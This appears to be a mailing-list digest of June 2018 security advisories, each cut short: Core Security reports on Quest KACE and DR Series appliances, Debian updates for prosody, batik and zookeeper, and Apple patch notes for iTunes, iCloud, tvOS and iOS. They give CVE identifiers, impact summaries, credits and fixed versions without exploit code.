[CORE-2018-0004] - Quest KACE System Management Appliance Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Quest KACE System Management Appliance Multiple Vulnerabilities 1. *Advisory Information* Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release 2. *Vulnerability Information* Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141 3. *Vulnerability Description* >From Quest KACE's website: "The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement." Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user. Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7. Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability. CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk. We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices. 4. *Vulnerable Packages* . Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148. For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410- 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective. Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user. Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token. In addition, issues
[SECURITY] [DSA 4216-1] prosody security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4216-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso June 02, 2018 https://www.debian.org/security/faq - - Package: prosody CVE ID : CVE-2018-10847 Debian Bug : 900524 It was discovered that Prosody, a lightweight Jabber/XMPP server, does not properly validate client-provided parameters during XMPP stream restarts, allowing authenticated users to override the realm associated with their session, potentially bypassing security policies and allowing impersonation. Details can be found in the upstream advisory at https://prosody.im/security/advisory_20180531/ For the oldstable distribution (jessie), this problem has been fixed in version 0.9.7-2+deb8u4. For the stable distribution (stretch), this problem has been fixed in version 0.9.12-2+deb9u2. We recommend that you upgrade your prosody packages. For the detailed security status of prosody please refer to its security tracker page at: https://security-tracker.debian.org/tracker/prosody Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlsS59lfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Q2xA//cqTm2GZYDmK4TI03zJ2n5km2o7IbHXvclgabl82I3XlhyAhf2pG/b5NS L/B3anqledd8+mJbgIBbJ6UoBi9TUMYTDBItbKXEE+GUEnp0avEPEbi5ukoAogWI F4Z8ourLACU7nNYHQPfxw2UatKdDcCDM2NPgRvN2/tHiTlPbJhm+E5q6byNPMavC naz0fzYnJhYagl13sy2cdWTt7F2H1+Cn45766iwcnR4vYO7uRVKB/siT7fgtbwPB 2DbTuuYujk3pfkrofS0T0Onff5PHKm4T3/mTRFbbJQySQHNZv5tz1vSqz7P1G6L4 169QQfa/5DNn5HkkT3dNAZvrunEdcZrERxPTMLthe2JM6NKUHP7eG3figWsvFoHM 3AK7jdiwHHXIzgURLR1igwcATRoDCZ3RnaMQqhXMF5ZvettrJmhMNjgKOAd934DE gQs7MLISzzjqfO/DXZoGHClbl7R6gsAgwWnOnm+15V2yMJVmoTWNWRmNs0/Ho/0T LvkIyd4uhMlk+SaKW6l+c2BblTkUZ5F7Dtt1l2qPQiZ3/VjCCQXQKoBh29yuxTn7 GccU3HvKkCCtMsZF6nJPr0Gu5ygWMb2R32MkFvRDnSpW8s2ITKBXunSs3+Y/B8JB XtWCCUBTAagrOh/elgZ+ZdFAqNCsHyFzt6yL1ihKK3oCN95QcOE= =aITq -END PGP SIGNATURE-
[CORE-2018-0002] - Quest DR Series Disk Backup Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Quest DR Series Disk Backup Multiple Vulnerabilities 1. *Advisory Information* Title: Quest DR Series Disk Backup Multiple Vulnerabilities Advisory ID: CORE-2018-0002 Advisory URL: http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release 2. *Vulnerability Information* Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146, CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, CVE-2018-11151, CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, CVE-2018-11156, CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, CVE-2018-11161, CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, CVE-2018-11166, CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, CVE-2018-11171, CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, CVE-2018-11176, CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180,
APPLE-SA-2018-06-01-7 iTunes 12.7.5 for Windows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-7 iTunes 12.7.5 for Windows iTunes 12.7.5 for Windows addresses the following: Security Available for: Windows 7 and later Impact: A local user may be able to read a persistent device identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4224: Abraham Masri (@cheesecakeufo) Security Available for: Windows 7 and later Impact: A local user may be able to modify the state of the Keychain Description: An authorization issue was addressed with improved state management. CVE-2018-4225: Abraham Masri (@cheesecakeufo) Security Available for: Windows 7 and later Impact: A local user may be able to view sensitive user information Description: An authorization issue was addressed with improved state management. CVE-2018-4226: Abraham Masri (@cheesecakeufo) WebKit Available for: Windows 7 and later Impact: Visiting a maliciously crafted website may lead to cookies being overwritten Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions. CVE-2018-4232: an anonymous researcher, Aymeric Chaib WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A race condition was addressed with improved locking. CVE-2018-4192: Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4214: found by OSS-Fuzz WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4246: found by OSS-Fuzz WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2018-4200: Ivan Fratric of Google Project Zero WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4201: an anonymous researcher CVE-2018-4218: Natalie Silvanovich of Google Project Zero CVE-2018-4233: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2018-4199: Alex Plaskett, Georgi Geshev, Fabi Beterke, and Nils of MWR Labs working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Visiting a maliciously crafted website may leak sensitive data Description: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method. CVE-2018-4190: Jun Kokatsu (@shhnjk) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4222: Natalie Silvanovich of Google Project Zero Installation note: iTunes 12.7.5 for Windows may be obtained from: https://www.apple.com/itunes/download/ Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEWpnGpHhyhjM9LuGIyxcaHpDFUHMFAlsRa1IpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQyxcaHpDFUHP/fQ// bAUfxBEfNQhOl4t72aEGpEAxkl7h9SLAixcC8ZhFzBcy6gKE1fEbrQiP+GWbefYV gmPwiSZRH2SyDGP0F4XTj1zLDXercGCU9tggmH+4Peqh7UzgDlAPPUc31DJqwbR5 Gs5mKXiTdYN2Kb0CI80BFQjYDOWnCqnufQgxwh9QJjn3olpJubW0VBp1appcLf+x ZABRh88TC5BttsnffnqwTOxykY+nFBQ6RtAWJB4dFcngDvhPudut+jp8l/mCtqcO
[SECURITY] [DSA 4215-1] batik security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4215-1 secur...@debian.org https://www.debian.org/security/ Sebastien Delafond June 02, 2018 https://www.debian.org/security/faq - - Package: batik CVE ID : CVE-2017-5662 CVE-2018-8013 Debian Bug : 860566 899374 Man Yue Mo, Lars Krapf and Pierre Ernst discovered that Batik, a toolkit for processing SVG images, did not properly validate its input. This would allow an attacker to cause a denial-of-service, mount cross-site scripting attacks, or access restricted files on the server. For the oldstable distribution (jessie), these problems have been fixed in version 1.7+dfsg-5+deb8u1. For the stable distribution (stretch), these problems have been fixed in version 1.8-4+deb9u1. We recommend that you upgrade your batik packages. For the detailed security status of batik please refer to its security tracker page at: https://security-tracker.debian.org/tracker/batik Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAlsSUFsACgkQEL6Jg/PV nWQKAQgAtoVouiI8CAu0mMH4CxzV9Gn+PheDY9BIdjfARj60IPGFt1JgwJGwdhuS ANRAYaYhwEl+ZJSi5QUunT+tmwjINkWVQ1OoQIULR+/51bbkPQsND8nj2rVsO8z4 BQFJqUVdpbF04nDAP2lxyLMevrS5v9bQTXZfchIQOYhu08+L4HHilnMzRKpeaFNo jHBfpOhT4puftGQDtPW3+Czrree7yjkyElryVXiaNupH1PYuBs7GH3cGIct4NNv/ 7cykB7tf0j7cL+82YOCe5PhWQJfF52uj4Uck92v+muV6G6H7/vNj8irfC+iW7sP1 s58xKHi+VG3tU66xb44dK4MteCk9SA== =n3ZC -END PGP SIGNATURE-
APPLE-SA-2018-06-01-3 iCloud for Windows 7.5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-3 iCloud for Windows 7.5 iCloud for Windows 7.5 is now available and addresses the following: Security Available for: Windows 7 and later Impact: A local user may be able to read a persistent device identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4224: Abraham Masri (@cheesecakeufo) Security Available for: Windows 7 and later Impact: A local user may be able to modify the state of the Keychain Description: An authorization issue was addressed with improved state management. CVE-2018-4225: Abraham Masri (@cheesecakeufo) Security Available for: Windows 7 and later Impact: A local user may be able to view sensitive user information Description: An authorization issue was addressed with improved state management. CVE-2018-4226: Abraham Masri (@cheesecakeufo) WebKit Available for: Windows 7 and later Impact: Visiting a maliciously crafted website may lead to cookies being overwritten Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions. CVE-2018-4232: an anonymous researcher, Aymeric Chaib WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A race condition was addressed with improved locking. CVE-2018-4192: Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4214: found by OSS-Fuzz WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4246: found by OSS-Fuzz WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2018-4200: Ivan Fratric of Google Project Zero WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4201: an anonymous researcher CVE-2018-4218: Natalie Silvanovich of Google Project Zero CVE-2018-4233: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT WebKit Available for: Windows 7 and later Impact: Visiting a maliciously crafted website may leak sensitive data Description: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method. CVE-2018-4190: Jun Kokatsu (@shhnjk) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2018-4199: Alex Plaskett, Georgi Geshev, Fabi Beterke, and Nils of MWR Labs working with Trend Micro's Zero Day Initiative WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4222: Natalie Silvanovich of Google Project Zero Installation note: iCloud for Windows 7.5 may be obtained from: https://support.apple.com/HT204283 Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEWpnGpHhyhjM9LuGIyxcaHpDFUHMFAlsRa08pHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQyxcaHpDFUHNOCQ// X91Forbmw5PUKgrm6FK9iXmS13aPTHbSDKJXgqHudoYVEbi/E9/I8XoiK4bcHubI 3fngXLlAXjr8f9om46ztAX4nuebGwWFgTXQMWiG9yXvs/FW1AYo9Xrf3inQNivcF TEfXqalryCUP3J7XiQriv5rc9SSdXzQwsa7ecV5pbbjN8MNWFiGxqLPpkP9V3Yg3 +qFM7o88F3qozYOruFGew1PrQDJjOUefW17tewWt7PaOm567LYKm8R4oJljZ2p1g
[SECURITY] [DSA 4214-1] zookeeper security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4214-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff June 01, 2018 https://www.debian.org/security/faq - - Package: zookeeper CVE ID : CVE-2018-8012 It was discovered that Zookeeper, a service for maintaining configuration information, enforced no authentication/authorisation when a server attempts to join a Zookeeper quorum. This update backports authentication support. Additional configuration steps are needed, please see https://cwiki.apache.org/confluence/display/ZOOKEEPER/Server-Server+mutual+authentication for additional information. For the oldstable distribution (jessie), this problem has been fixed in version 3.4.9-3+deb8u1. For the stable distribution (stretch), this problem has been fixed in version 3.4.9-3+deb9u1. We recommend that you upgrade your zookeeper packages. For the detailed security status of zookeeper please refer to its security tracker page at: https://security-tracker.debian.org/tracker/zookeeper Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlsRuPwACgkQEMKTtsN8 TjbnMw//fDJ4aC9z7/eDPlOHURPJPVshFSWcNeyTSnJR5lIESzpTJD5zEt7kHfGN jU5akO5ZEiJn0A2z4XGzCATKKZveLqsJyXvGi5Y40XeaUIyrjz8xvCgsCwTyVoqx d93laGfHQCF9r28nR16y8zX9+QtMfy1RtJKuQGy4veBv34tVoUkr1Fr7ibyGlSNg ZKHeJjzDEYSrl1CGTAXqYUcF0vyPMgqwZpjHMBF28eRk+pCXIBMQKlKp1Q6k3Y9Z GhglRu3X87ftnuthaRDSI4jnNBLxHWFhluALwRP6U+92B7cKKFzv5MuoWxBDrY8W TngF7e1sCZCpFb2JWlXdQupxFwZgMJ4cztWgMeWK3WabgRjvFEXBaw/HJlEErTxN kqHpPdDkt8XAUgpbezR63f8LZyPoD9H7/Na5WpygpOEJfCEYcDUAPxkV6FCW5ZH3 h5jtoLrOuN7EhRAvz/ykx/UmXmcou6t66toACQQrJFHvXy9gMQEJW9D6tUqcFUBA xkWef+lRM65hGBD1HsZaIDI8f4D8wguYAthh76nLLe1VE0X2kzLn4/kzjQ8fw8/L Lobz0IBe71YC5n090akWs+LPgUfEkWErn5ayJW4mII0hY4ktpiIFVMxhPRaNuwx1 CVwFg8YlEFc2TWhsWEA5ikH5R9JCpe6lLPOZXSGgg9DQ2h7N118= =9SrO -END PGP SIGNATURE-
APPLE-SA-2018-06-01-6 tvOS 11.4
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-6 tvOS 11.4 tvOS 11.4 addresses the following: Crash Reporter Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved error handling. CVE-2018-4206: Ian Beer of Google Project Zero FontParser Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2018-4211: Proteas of Qihoo 360 Nirvan Team Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2018-4241: Ian Beer of Google Project Zero CVE-2018-4243: Ian Beer of Google Project Zero Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved validation. CVE-2018-4249: Kevin Backhouse of Semmle Ltd. libxpc Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved validation. CVE-2018-4237: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative Messages Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to conduct impersonation attacks Description: An injection issue was addressed with improved input validation. CVE-2018-4235: Anurodh Pokharel of Salesforce.com Messages Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted message may lead to a denial of service Description: This issue was addressed with improved message validation. CVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd Security Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to read a persistent device identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4224: Abraham Masri (@cheesecakeufo) Security Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to read a persistent account identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4223: Abraham Masri (@cheesecakeufo) UIKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted text file may lead to a denial of service Description: A validation issue existed in the handling of text. This issue was addressed with improved validation of text. CVE-2018-4198: Hunter Byrnes WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Visiting a maliciously crafted website may lead to cookies being overwritten Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions. CVE-2018-4232: an anonymous researcher, Aymeric Chaib WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A race condition was addressed with improved locking. CVE-2018-4192: Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4214: found by OSS-Fuzz WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4246: found by OSS-Fuzz WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2018-4200: Ivan Fratric of Google Project Zero WebKit Available for: Apple TV 4K and Apple TV (4th generation) Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with
APPLE-SA-2018-06-01-4 iOS 11.4
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-4 iOS 11.4 iOS 11.4 addresses the following: Bluetooth Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved size validation. CVE-2018-4215: Abraham Masri (@cheesecakeufo) Contacts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted vcf file may lead to a denial of service Description: A validation issue existed in the handling of phone numbers. This issue was addressed with improved validation of phone numbers. CVE-2018-4100: Abraham Masri (@cheesecakeufo) FontParser Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2018-4211: Proteas of Qihoo 360 Nirvan Team iBooks Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to spoof password prompts in iBooks Description: An input validation issue was addressed with improved input validation. CVE-2018-4202: Jerry Decime Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved validation. CVE-2018-4249: Kevin Backhouse of Semmle Ltd. Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2018-4241: Ian Beer of Google Project Zero CVE-2018-4243: Ian Beer of Google Project Zero libxpc Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved validation. CVE-2018-4237: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative Magnifier Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to view the last image used in Magnifier from the lockscreen Description: A permissions issue existed in Magnifier. This was addressed with additional permission checks. CVE-2018-4239: an anonymous researcher Mail Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker may be able to exfiltrate the contents of S/MIME-encrypted e-mail Description: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail. CVE-2018-4227: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to conduct impersonation attacks Description: An injection issue was addressed with improved input validation. CVE-2018-4235: Anurodh Pokharel of Salesforce.com Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted message may lead to a denial of service Description: This issue was addressed with improved message validation. CVE-2018-4240: Sriram 